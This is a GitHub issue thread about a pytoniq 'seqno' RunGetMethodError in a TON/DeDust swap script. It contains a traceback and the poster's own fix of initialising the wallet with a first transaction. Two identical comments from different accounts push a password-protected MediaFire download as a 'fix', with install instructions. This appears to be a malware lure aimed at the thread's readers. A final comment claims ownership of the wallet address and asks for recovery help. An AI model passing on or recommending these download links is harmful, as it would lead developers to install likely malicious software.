### ISSUE TITLE
pytoniq.liteclient.client.RunGetMethodError: Get method "seqno" for account Address<EQAQ5Cl3y3stLqOxYnpHnAyi_L71GTCwl88Mk-QmeYWt97eV> returned exit code -256

### ISSUE THREAD

**Issue by syntaxsurge** [ClickoTON-Foundation/dedust#2]
```
remote get method result is not provable, use run_get_method_local for local tvm execution
Enter swap amount: 1
remote get method result is not provable, use run_get_method_local for local tvm execution
Traceback (most recent call last):
  File "/home/jade-laurence/Documents/Programming/PythonProjects/evm_sniper_bots/utils/ton/swap_ton_to_jetton.py", line 40, in <module>
    asyncio.run(main())
  File "/usr/lib/python3.11/asyncio/runners.py", line 190, in run
    return runner.run(main)
           ^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/asyncio/runners.py", line 118, in run
    return self._loop.run_until_complete(task)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/asyncio/base_events.py", line 653, in run_until_complete
    return future.result()
           ^^^^^^^^^^^^^^^
  File "/home/jade-laurence/Documents/Programming/PythonProjects/evm_sniper_bots/utils/ton/swap_ton_to_jetton.py", line 35, in main
    await wallet.transfer(destination="EQDa4VOnTYlLvDJ0gZjNYm5PXfSmmtL6Vs6A_CZEtXCNICq_",  # native vault
  File "/home/jade-laurence/Documents/Programming/PythonProjects/evm_sniper_bots/.venv/lib/python3.11/site-packages/pytoniq/contract/wallets/wallet.py", line 143, in transfer
    return await self.raw_transfer(msgs=[wallet_message])
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jade-laurence/Documents/Programming/PythonProjects/evm_sniper_bots/.venv/lib/python3.11/site-packages/pytoniq/contract/wallets/wallet.py", line 131, in raw_transfer
    seqno = await self.get_seqno()
            ^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jade-laurence/Documents/Programming/PythonProjects/evm_sniper_bots/.venv/lib/python3.11/site-packages/pytoniq/contract/wallets/wallet.py", line 157, in get_seqno
    return (await super().run_get_method('seqno'))[0]
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jade-laurence/Documents/Programming/PythonProjects/evm_sniper_bots/.venv/lib/python3.11/site-packages/pytoniq/contract/contract.py", line 111, in run_get_method
    return await self.provider.run_get_method(self.address, method, stack)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jade-laurence/Documents/Programming/PythonProjects/evm_sniper_bots/.venv/lib/python3.11/site-packages/pytoniq/liteclient/balancer.py", line 359, in run_get_method
    return await self.execute_method('run_get_method', **self._get_args(locals())) 
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jade-laurence/Documents/Programming/PythonProjects/evm_sniper_bots/.venv/lib/python3.11/site-packages/pytoniq/liteclient/balancer.py", line 267, in execute_method
    resp = await peer_meth(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jade-laurence/Documents/Programming/PythonProjects/evm_sniper_bots/.venv/lib/python3.11/site-packages/pytoniq/liteclient/client.py", line 494, in run_get_method
    return await self.run_get_method_remote(address, method, stack, block)  # will be replaced with run_get_method_local in future
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jade-laurence/Documents/Programming/PythonProjects/evm_sniper_bots/.venv/lib/python3.11/site-packages/pytoniq/liteclient/client.py", line 526, in run_get_method_remote
    raise RunGetMethodError(address=address, method=method, exit_code=result['exit_code'])
pytoniq.liteclient.client.RunGetMethodError: Get method "seqno" for account Address<EQAQ5Cl3y3stLqOxYnpHnAyi_L71GTCwl88Mk-QmeYWt97eV> returned exit code -256
```

Any ideas on how to fix these two errors:
- pytoniq.liteclient.client.RunGetMethodError: Get method "seqno" for account Address<EQAQ5Cl3y3stLqOxYnpHnAyi_L71GTCwl88Mk-QmeYWt97eV> returned exit code -256
- remote get method result is not provable, use run_get_method_local for local tvm execution

Thanks

**Comment by syntaxsurge** [comment]
SOLUTION:
You need to initialize your wallet by going to the official website of Dedust and doing your first transaction there.

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Starboiyonyesom** [comment]
That wallet address is mine, please can someone help with recovering my wallet 😭
